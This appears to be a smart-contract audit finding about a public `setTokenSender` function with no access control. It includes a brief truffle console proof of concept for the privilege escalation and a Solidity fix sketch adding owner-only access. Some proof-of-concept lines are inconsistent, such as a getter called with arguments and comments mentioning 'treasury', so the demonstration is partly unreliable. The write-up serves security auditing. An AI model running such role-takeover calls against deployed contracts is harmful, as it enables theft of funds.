The `setTokenSender` function, which is responsible for setting the token sender role, is public with no access control, which lets an attacker escalate his privileges to the token sender role.
```
truffle console --networkId 555
compile
user = "choose address from the ganache list"
attacker = "choose address from the ganache list"
TokenSenderCaller.deployed().then(function(instance){app=instance;})
app.setTokenSender(user,{from:user})
app.getTokenSender()
// returns treasury
app.getTokenSender(attacker,{from:attacker})
// will return the new treasury
```
Manual
Add access control on the function
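One way to apply this mitigation, as an added sketch that is not the audited project's code: the contract name, the `_owner` and `_tokenSender` storage, the event and the function signatures are assumptions, since the issue does not show the contract source.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical contract for illustration; only the names setTokenSender and
// getTokenSender come from the issue, everything else is assumed.
contract TokenSenderCallerSketch {
    address private _owner;       // assumed: account allowed to manage the role
    address private _tokenSender; // assumed: storage behind the token sender role

    event TokenSenderChanged(address indexed previous, address indexed current);

    constructor() {
        // The deployer becomes the only account that may change the role.
        _owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == _owner, "caller is not the owner");
        _;
    }

    // Before (the behaviour the issue reports): any account can call this.
    // function setTokenSender(address tokenSender) public {
    //     _tokenSender = tokenSender;
    // }

    // After: the setter is restricted, rejects the zero address, and emits an
    // event so role changes can be monitored off-chain.
    function setTokenSender(address tokenSender) public onlyOwner {
        require(tokenSender != address(0), "token sender is the zero address");
        emit TokenSenderChanged(_tokenSender, tokenSender);
        _tokenSender = tokenSender;
    }

    function getTokenSender() external view returns (address) {
        return _tokenSender;
    }
}
```

With this guard in place, a `setTokenSender` call sent from any account other than the owner reverts with "caller is not the owner" and the stored role is unchanged.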